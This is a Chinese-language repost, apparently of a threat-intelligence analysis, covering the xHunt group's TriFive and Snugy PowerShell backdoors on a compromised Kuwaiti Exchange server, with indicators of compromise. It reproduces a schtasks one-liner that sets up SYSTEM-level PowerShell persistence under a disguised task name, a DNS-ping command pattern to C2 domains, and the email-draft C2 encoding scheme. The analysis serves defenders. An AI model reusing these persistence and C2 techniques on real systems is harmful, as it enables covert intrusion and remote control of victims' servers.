您好,登錄后才能下訂單哦!
這篇文章將為大家詳細講解有關TriFive和Snugy后門的示例分析,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
xHunt活動從2018年7月份一直活躍至今,這個組織的主要目標針對的是科威特政府和航運運輸組織。近期研究人員發現,xHunt的攻擊者又攻擊了科威特一家機構的Microsoft Exchange服務器。雖然我們無法確認攻擊者是如何入侵這臺Exchange服務器的,但是根據此次事件相關的計劃任務創建時間戳,我們發現攻擊者早在2019年8月22日之前就已經能夠訪問這臺Exchange服務器了。在此活動中,攻擊者使用了兩個后門,一個是TriFive,另一個是Snugy的變種版本(這是一個Web Shell,我們稱之為BumbleBee)。
TriFive和Snugy后門本質上是PowerShell腳本,可以幫助攻擊者訪問被入侵的Exchange服務器,并使用不同的C2信道來進行通信。TriFive后門使用的是一個基于電子郵件的信道,這個信道可以使用Exchange Web服務(EWS)在被入侵的電子郵件帳號的已刪除郵件夾中創建郵件草稿。Snugy后門則使用的是DNS隧道來實現命令控制。
在2020年9月份,我們發現xHunt攻擊者入侵了科威特的一家機構組織。該組織的Exchange服務器上出現了通過IIS進程w3wp.exe執行可以命令的行為。攻擊者在發送這些命令時,使用的是一個被稱為BumbleBee的Web Shell,它已經被安裝在了受感染的Exchange服務器。我們在分析服務器日志時,發現了兩個由攻擊者創建的計劃任務,這兩個任務都會運行惡意的PowerShell腳本。我們現在還無法確定攻擊者是否使用了這些PowerShell腳本中的任何一個來安裝webshell,但是我們相信攻擊者在日志記錄事件之前就已經訪問過這臺Exchange服務器了。
攻擊者在這臺Exchange服務器上創建了兩個任務,即ResolutionHosts和ResolutionHosts,這兩個任務都是在c:\Windows\System32\tasks\Microsoft\Windows\WDI文件夾中創建的。默認情況下,該文件夾在Windows系統上還存儲一個合法的ResolutionHost任務,具體如下圖所示。合法的ResolutionHost任務與Windows診斷基礎結構(WDI)解析主機關聯,它主要用于為系統上出現的問題提供交互式故障排除。我們認為,攻擊者選擇這個任務名稱主要是為了隱藏自己的攻擊活動。
在2019年8月28日和2019年10月22日,攻擊者創建了ResolutionHosts和ResolutionHosts任務,以運行兩個獨立的基于PowerShell的后門。攻擊者使用這兩個調度任務作為持久性方法,因為計劃任務會反復運行這兩個PowerShell腳本,不過運行的時間間隔不同。下圖顯示的是這兩個任務及其相關的創建時間、運行間隔和執行的命令。這兩個任務執行的命令將嘗試運行splwow64.ps1和OfficeIntegrator.ps1,分別是我們稱之為TriFive的后門和CASHY200的變種(我們稱之為Snugy)。這些腳本存儲在系統上的兩個單獨的文件夾中,這很可能是為了避免兩個后門都被發現和刪除。
上圖還顯示,TriFive后門每5分鐘運行一次,而Snugy后門每30分鐘運行一次。我們無法確認間隔時間差異背后的確切原因,但可能與后門相關的C2通道的隱蔽性有關。比如說,Snugy使用DNS隧道作為C2信道,因此它的間隔可能比TriFive長,與TriFive使用的基于電子郵件的C2信道相比,Snugy使用的是一個更加明顯的C2信道,因此被檢測到的可能性更高。
我們現在還無法確認攻擊者是如何創建ResolutionHosts和ResolutionHosts任務的。但是,我們知道攻擊者在其他系統上安裝Snugy樣本時,攻擊者使用的是批處理腳本來創建名為SystemDataProvider和CacheTask的計劃任務。比如說,下面的批處理腳本將創建并運行名為SystemDataProvider的計劃任務,并最終運行名為xpsrchvw.ps1的Snugy樣本:
schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\Windows\SideShow\SystemDataProvider” /tr “powershell -exec bypass -file C:\Windows\Temp\xpsrchvw.ps1” /ru SYSTEM & schtasks /run /tn “\Microsoft\Windows\SideShow\SystemDataProvider”
TriFive是一個以前從未被發現過的PowerShell后門,xHunt的攻擊者會在受感染的Exchange服務器上安裝這個后門,并通過一個計劃任務每五分鐘執行一次。TriFive通過登錄合法用戶的收件箱并從“已刪除郵件”文件夾中的電子郵件草稿中獲取PowerShell腳本,從而提供了對Exchange服務器的持久化后門訪問。TriFive樣本使用了目標組織的合法帳戶名和憑據,這也表明在安裝TriFive后門之前,攻擊者已成功竊取了目標的賬戶憑證。
事實上,基于電子郵件的C2也在Hisoka工具中使用過,雖然Hisoka工具使用電子郵件草稿發送和接收數據,但這些草稿仍保留在草稿文件夾中,而TriFive后門則專門將其電子郵件草稿保存到“已刪除郵件”文件夾中。
為了向后門發出命令,攻擊者需要登錄到同一個合法的電子郵件帳戶并創建一個主題為555的電子郵件草稿,其中就包括了加密和Base64編碼格式的命令。下圖顯示的一封包含演示命令的郵件,主題為555,郵件內容為woFyeWt3cw==,該腳本將通過PowerShell執行:
為了運行攻擊者提供的命令,PowerShell腳本需要登錄到Exchange服務器上的合法電子郵件帳戶,并檢查“已刪除郵件”文件夾中主題為555的電子郵件。腳本將打開電子郵件草稿,并使用Base64解碼電子郵件消息正文中的內容,然后通過從每個字符中減去10來解密解碼命令內容。然后,腳本會使用PowerShell的內置Invoke Expression(iex)cmdlet來生成明文內容。在執行提供的PowerShell代碼之后,腳本將對結果進行加密,方法是在每個字符上加10,并對密文進行Base64編碼。接下來,TriFive會將命令結果發送給攻擊者,并將編碼的密文設置為電子郵件草稿的消息體,它將保存在主題為555的“已刪除郵件”文件夾中。下圖顯示了TriFive腳本創建的“已刪除郵件”文件夾中的一個電子郵件草稿樣例,它會將命令的運行結果以主題為555,消息內容為“bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA”的郵件進行發送。
TriFive PowerShell腳本并不是通過代碼循環來實現持久化運行的,而是通過前面提到的ResolutionsHosts調度任務來實現其持久化操作。
我們在ResolutionHosts任務中看到的OfficeIntegrator.ps1文件是一個基于PowerShell的后門,我們將其稱之為Snugy,它將允許攻擊者獲取目標系統的主機名并執行命令。Snugy是CASHY200后門的一個變種版本,攻擊者也曾在之前的xHunt活動中使用過這個后門。在2019年7月,趨勢科技曾為這個后門創建過檢測簽名-Backdoor.PS1.NETERO.A,這也表明CASHY200的這個特殊變種已經存在一年多了。
Snugy樣本會隨機選擇下列域名來作為其C2域名:
hotsoft[.]icu uplearn[.]top lidarcc[.]icu deman1[.]icu
跟CASHY200后門的早期變種版本類似,Snugy變種將使用下列命令來跟自定義域名連接,并嘗試在將ICMP請求發送到解析IP地址之前解析該域:
cmd /c ping -n 1 <custom crafted sub-domain>.<C2 domain>
Snugy將使用下列正則表達式來從ping命令的結果中提取出IP地址:
\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
下面給出的是Snugy后門的命令處理服務器:
Snugy創建的子域名包含一個通信類型字段,該字段定義了數據字段中元素的順序,下面給出是C2域名結構:
<character for communication type><character for order of fields in data section><data section>.<C2 domain>
407e5fe4f6977dd27bc0050b2ee8f04b398e9bd28edd9d4604b782a945f8120f
c18985a949cada3b41919c2da274e0ffa6e2c8c9fb45bade55c1e3b6ee9e1393 6c13084f213416089beec7d49f0ef40fea3d28207047385dda4599517b56e127 efaa5a87afbb18fc63dbf4527ca34b6d376f14414aa1e7eb962485c45bf38372 a4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c
deman1[.]icu
hotsoft[.]icu
uplearn[.]top
lidarcc[.]icu
sharepoint-web[.]com
ResolutionHosts
ResolutionsHosts
SystemDataProvider
CacheTask-
關于“TriFive和Snugy后門的示例分析”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。